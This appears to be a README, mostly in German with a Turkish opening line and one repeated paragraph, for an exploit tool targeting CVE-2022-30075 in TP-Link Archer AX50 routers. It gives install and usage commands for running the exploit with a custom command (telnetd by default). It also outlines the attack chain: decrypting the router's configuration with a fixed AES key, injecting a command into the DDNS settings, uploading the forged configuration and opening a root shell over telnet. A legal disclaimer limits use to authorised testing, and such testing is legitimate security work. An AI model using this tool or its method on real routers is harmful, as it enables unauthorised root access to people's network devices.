
TP-Link Router Authenticated RCE Exploit (CVE-2022-30075) Bu araç, TP-Link Archer AX50 ve bazı diğer TP-Link router modellerinde bulunan **CVE-2022-30075** güvenlik açığını kullanarak kimliği doğrulanmış uzaktan komut çalıştırma (Authenticated Remote Code Execution) işlemi gerçekleştirir.
TP-Link Router Authenticated RCE Exploit (CVE-2022-30075) Dieses Tool führt unter Verwendung der Sicherheitslücke CVE-2022-30075 in TP-Link Archer AX50 und einigen anderen TP-Link Router-Modellen eine authentifizierte Remote-Code-Ausführung (Authenticated Remote Code Execution) durch.
Dieses Tool führt unter Verwendung der Sicherheitslücke CVE-2022-30075 in TP-Link Archer AX50 und einigen anderen TP-Link Router-Modellen eine authentifizierte Remote-Code-Ausführung (Authenticated Remote Code Execution) durch.
**Die VERWENDUNG DIESES TOOLS AUF FREMDEN SYSTEMEN OHNE ERLAUBNIS IST EINE STRAFTAT **
- Verwenden Sie es nur auf Geräten, die Ihnen gehören oder für die Sie eine Testberechtigung haben
- Unbefugte Nutzung ist illegal und hat rechtliche Konsequenzen
- Stellen Sie vor der Verwendung dieses Tools sicher, dass es mit den örtlichen Gesetzen vereinbar ist
- Die Entwickler haften nicht für Schäden, die durch Missbrauch dieses Tools entstehen
pip install requests pycryptodome
Grundlegende Verwendung
python exploit.py -t 192.168.0.1 -p router_passwort
Verwendung mit benutzerdefiniertem Befehl.
python exploit.py -t 192.168.0.1 -p router_passwort -c "touch /tmp/exploit"
Nur Backup erstellen und entschlüsseln
python exploit.py -t 192.168.0.1 -p router_passwort -b
Nur verschlüsseltes Verzeichnis wiederherstellen
python exploit.py -t 192.168.0.1 -p router_passwort -r /pfad/zum/entschluesselten/verzeichnis
-t | IP-Adresse des Routers (erforderlich)
-p | Administrator-Passwort des Routers (erforderlich)
-c | Auszuführender Befehl (Standard: telnetd)
-b | Nur Backup erstellen und entschlüsseln
-r | Nur verschlüsseltes Verzeichnis wiederherstellen
Authentifizierung - Anmeldung am Router mit Administrator-Passwort
Konfiguration herunterladen - Verschlüsselte Konfigurationsdatei vom Router abrufen
Entschlüsselung - Konfiguration mit festem AES-Schlüssel entschlüsseln
Befehlseinschleusung - Zielbefehl in die DDNS-Einstellungen einfügen
Verschlüsselung - Modifizierte Konfiguration erneut verschlüsseln
Wiederherstellung - Gefälschte Konfiguration auf den Router hochladen
Zugriff - Nach einem Router-Neustart Verbindung zur Root-Shell via Telnet herstellen
Einige Minuten nach dem Router-Neustart:
telnet 192.168.0.1
Mit diesem Befehl können Sie auf die Root-Shell zugreifen.